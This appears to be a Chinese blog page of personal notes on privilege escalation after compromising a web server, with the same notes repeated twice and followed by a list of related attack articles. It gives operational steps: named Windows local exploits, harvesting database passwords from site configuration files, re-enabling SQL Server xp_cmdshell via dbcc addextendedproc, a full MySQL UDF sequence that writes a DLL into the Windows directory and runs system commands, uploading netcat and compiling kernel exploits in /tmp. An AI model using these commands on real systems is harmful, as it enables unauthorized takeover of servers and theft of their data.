提权
2014-03-21 11:20
232 查看
优先顺序:本地提权-应用提权-数据库提权
在windows中guest和User用户不能登陆3389
poweruser可以登陆3389
LINUX 只有内核提权
tasklist
提权
1.windows提权(RECYCLER目录可读)
将cmd.exe传到RECYCLER里面
ipconfig
whoami
netstat
systeminfo
net user
要开3389端口
查看这两个漏洞添加可远程登陆用户
ms13052 (不稳定不一定可以成功)
ms11080 kb259799 (win7 2008也有) 26 27
ms11080.exe gats都是用户名
巴西烤肉
10015
10048
添加pwd那两个文件到recycle里面) 密码破解工具 ntlm站点 hash.craker.com
library.dll复制到system32李米娜
在cmd里面执行那个可执行文件
2.linux提权(内核本地提权,内核本地溢出)
3.数据库提权
access不能提权
SQLSERVER sa的用户才可以提权
mysql root权限才能提权,而且只能在Windows操作系统中提权。
oracle system权限才能提权(不需要提权)
sysbase
asp网站 user权限
asp.net网站 poweruser权限
php网站 在windows里面system权限(应为安装apache要用system权限)
在LINUX里面普通管理员权限
jsp 在windows和Linux里面都是最高权限
linux 如果装tomecate或java就是system权限,其它是普通权限。apache默认没有密码。
1.找数据库连接账户和密码
php asp目录(Inc data conn)中找连接池文件(data.asp ,config.asp,conn.asp)
asp.net在web.config目录中 JDBC
java保存在web_info文件夹里面。
用SQLtools连接
未能执行存储过程,就要在PPT里面找那个xp_cmdshell的那个文件考过来
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
如果恢复存储过程恢复不成功,就上传xplog70.dll到目录
如果提示Error Message:无法装载 DLL C:\Inetpub\testweb\xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。
则先执行
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
dbcc addextendedproc ("xp_cmdshell",“XXXX/xplog70.dll")
然后上传"xplog70.dll"到一个可以访问的目录,或者扔到回收站,然后执行
dbcc addextendedproc ("xp_cmdshell","c:\recycel\xplog70.dll")
Mysql提权
1.需要root权限,但只能在windows中。安装是system权限,也可能被降为user权限,进去再shell中whoami查看,到那时要提权。
2.如果在Linux中,不能提权。是apache组。
func反弹 可能会造成假死,一般不同
udf直连 udf是一个模块,需要udf.dll。把udf.dll上传到windows目录c:/windows中,将其注册后从而执行cmdshell。
先放udp.php到回收站,然后用Mysql写入表,然后再把表导入windows里面。
create table cdb_mix(abc longblob);
insert into cdb_mix values(load_file('c:\\RECYCLER\\ma.dll'));
select * from cdb_mix into dumpfile 'c:\\windows\\md.dll';
create function cmdshell returns string soname 'ma.dll';
select cmdshell('net user');
drop table if exists cdb_mix;
4.应用提权
serv-U system
43958
的安装目录
linux拿ROOT权限
linux传NC的那个码
linux提权点击链接,复制链接到cmd里面,点开始链接
传full.的码到temp目录下
cd /tmp
uname -a
gcc -w xxx -o 121
___________________________________________________________________________
同url,不同参数的算一个
超过3个sql注入或跨站,就写大量的sql注入或跨站。
大量的sql注入,列举三个。
在windows中guest和User用户不能登陆3389
poweruser可以登陆3389
LINUX 只有内核提权
tasklist
提权
1.windows提权(RECYCLER目录可读)
将cmd.exe传到RECYCLER里面
ipconfig
whoami
netstat
systeminfo
net user
要开3389端口
查看这两个漏洞添加可远程登陆用户
ms13052 (不稳定不一定可以成功)
ms11080 kb259799 (win7 2008也有) 26 27
ms11080.exe gats都是用户名
巴西烤肉
10015
10048
添加pwd那两个文件到recycle里面) 密码破解工具 ntlm站点 hash.craker.com
library.dll复制到system32李米娜
在cmd里面执行那个可执行文件
2.linux提权(内核本地提权,内核本地溢出)
3.数据库提权
access不能提权
SQLSERVER sa的用户才可以提权
mysql root权限才能提权,而且只能在Windows操作系统中提权。
oracle system权限才能提权(不需要提权)
sysbase
asp网站 user权限
asp.net网站 poweruser权限
php网站 在windows里面system权限(应为安装apache要用system权限)
在LINUX里面普通管理员权限
jsp 在windows和Linux里面都是最高权限
linux 如果装tomecate或java就是system权限,其它是普通权限。apache默认没有密码。
1.找数据库连接账户和密码
php asp目录(Inc data conn)中找连接池文件(data.asp ,config.asp,conn.asp)
asp.net在web.config目录中 JDBC
java保存在web_info文件夹里面。
用SQLtools连接
未能执行存储过程,就要在PPT里面找那个xp_cmdshell的那个文件考过来
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
如果恢复存储过程恢复不成功,就上传xplog70.dll到目录
如果提示Error Message:无法装载 DLL C:\Inetpub\testweb\xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。
则先执行
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
dbcc addextendedproc ("xp_cmdshell",“XXXX/xplog70.dll")
然后上传"xplog70.dll"到一个可以访问的目录,或者扔到回收站,然后执行
dbcc addextendedproc ("xp_cmdshell","c:\recycel\xplog70.dll")
Mysql提权
1.需要root权限,但只能在windows中。安装是system权限,也可能被降为user权限,进去再shell中whoami查看,到那时要提权。
2.如果在Linux中,不能提权。是apache组。
func反弹 可能会造成假死,一般不同
udf直连 udf是一个模块,需要udf.dll。把udf.dll上传到windows目录c:/windows中,将其注册后从而执行cmdshell。
先放udp.php到回收站,然后用Mysql写入表,然后再把表导入windows里面。
create table cdb_mix(abc longblob);
insert into cdb_mix values(load_file('c:\\RECYCLER\\ma.dll'));
select * from cdb_mix into dumpfile 'c:\\windows\\md.dll';
create function cmdshell returns string soname 'ma.dll';
select cmdshell('net user');
drop table if exists cdb_mix;
4.应用提权
serv-U system
43958
的安装目录
linux拿ROOT权限
linux传NC的那个码
linux提权点击链接,复制链接到cmd里面,点开始链接
传full.的码到temp目录下
cd /tmp
uname -a
gcc -w xxx -o 121
___________________________________________________________________________
同url,不同参数的算一个
超过3个sql注入或跨站,就写大量的sql注入或跨站。
大量的sql注入,列举三个。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 当servU提权遭遇到防火墙时
- Serv-U提权之CMD下提权命令
- SERV-U 6.4提权方法,通杀SERV-U版本
- [提权技术] Discuz! 6 后台拿Shell的方法
- MS Windows Token Kidnapping本地提权的解决方案
- Windows系统提权——登录后门全设置
- 利用BASH提权的技巧,使用SU创建用户
- WindowS下APACHE提权技术
- Serv-U 8 本地提权
- Linux利用udev提权
- win2008提权工具
- 驱动中的进程提权
- linux提权之mysql的root权限通过system函数提权(图文教程)
- linux非交互环境下本地提权思路与反思 linux localroot exploit
- Auto-Rooting Script(全自动提权脚本)
- 1433口令提权的详细过程
- linux溢出提权
- 提权函数之RtlAdjustPrivilege()
- 九种经典的Webshell提权技术
- webshell提权的重点目录总结